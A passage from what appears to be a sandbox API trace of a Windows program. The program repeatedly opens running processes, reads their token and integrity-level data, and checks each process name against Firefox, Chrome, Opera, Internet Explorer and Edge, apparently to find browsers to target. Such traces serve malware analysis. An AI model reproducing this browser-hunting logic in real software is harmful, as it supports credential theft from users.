TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0245.501] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0245.501] CloseHandle (hObject=0xb8) returned 1 [0245.501] CloseHandle (hObject=0xb4) returned 1 [0245.501] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.501] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0245.502] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0245.502] GetLastError () returned 0x7a [0245.502] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0245.502] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0245.502] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0245.502] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0245.502] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0245.502] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0245.502] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0245.503] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0245.503] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0245.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0xb4 [0245.503] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0245.503] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0245.503] GetLastError () returned 0x7a [0245.503] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0245.503] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0245.504] CloseHandle (hObject=0xb8) returned 1 [0245.504] CloseHandle (hObject=0xb4) returned 1 [0245.504] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.504] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0245.505] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0245.505] GetLastError () returned 0x7a [0245.505] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0245.505] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0245.505] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0245.505] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0245.505] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0245.506] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0245.506] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0245.506] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0245.506] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0245.506] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0xb4 [0245.506] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0245.506] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0245.506] GetLastError () returned 0x7a [0245.506] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0245.507] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0245.507] CloseHandle (hObject=0xb8) returned 1 [0245.507] CloseHandle (hObject=0xb4) returned 1 [0245.507] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.507] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0245.507] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0245.507] GetLastError () returned 0x7a [0245.507] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0245.507] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0245.507] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0245.508] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0245.508] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0245.508] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0245.508] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0245.508] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0245.508] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0245.508] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0xb4 [0245.508] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0245.508] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0245.508] GetLastError () returned 0x7a [0245.508] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0245.508] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0245.508] CloseHandle (hObject=0xb8) returned 1 [0245.509] CloseHandle (hObject=0xb4) returned 1 [0245.509] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.509] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0245.509] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0245.509] GetLastError () returned 0x7a [0245.509] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0245.509] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0245.509] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0245.509] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0245.509] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0245.509] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0245.509] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0245.510] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0245.510] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0245.510] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0xb4 [0245.510] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0245.510] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0245.510] GetLastError () returned 0x7a [0245.510] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0245.510] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0245.510] CloseHandle (hObject=0xb8) returned 1 [0245.510] CloseHandle (hObject=0xb4) returned 1 [0245.510] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.510] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0245.511] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0245.511] GetLastError () returned 0x7a [0245.511] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0245.511] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0245.511] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0245.511] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0245.511] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0245.511] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0245.511] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0245.511] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0245.511] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0245.511] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0xb4 [0245.511] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0245.512] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0245.512] GetLastError () returned 0x7a [0245.512] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0245.512] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0245.512] CloseHandle (hObject=0xb8) returned 1 [0245.512] CloseHandle (hObject=0xb4) returned 1 [0245.512] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.512] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0245.512] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0245.512] GetLastError () returned 0x7a [0245.512] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0245.512] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0245.512] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0245.513] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0245.513] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0245.513] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0245.513] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0245.513] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0245.513] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0245.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0xb4 [0245.513] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0245.513] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0245.513] GetLastError () returned 0x7a [0245.513] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0245.513] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0245.513] CloseHandle (hObject=0xb8) returned 1 [0245.513] CloseHandle (hObject=0xb4) returned 1 [0245.513] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.513] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0245.513] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0245.514] GetLastError () returned 0x7a [0245.514] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0245.514] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0245.514] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0245.514] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0245.514] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0245.514] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0245.514] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0245.514] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0245.514] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0245.514] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0xb4 [0245.514] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0245.514] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0245.514] GetLastError () returned 0x7a [0245.514] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0245.514] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0245.514] CloseHandle (hObject=0xb8) returned 1 [0245.515] CloseHandle (hObject=0xb4) returned 1 [0245.515] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.515] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0245.515] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0245.515] GetLastError () returned 0x7a [0245.515] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0245.515] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0245.515] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0245.515] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0245.515] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0245.515] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0245.515] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0245.515] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0245.515] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0245.515] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0xb4 [0245.515] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0245.516] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0245.516] GetLastError () returned 0x7a [0245.516] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0245.516] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0245.516] CloseHandle (hObject=0xb8) returned 1 [0245.516] CloseHandle (hObject=0xb4) returned 1 [0245.516] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.516] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0245.516] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0245.516] GetLastError () returned 0x7a [0245.516] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0245.516] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0245.516] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0245.516] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0245.516] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0245.517] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0245.517] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0245.517] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0245.517] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0245.517] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0xb4 [0245.517] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0245.517] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, 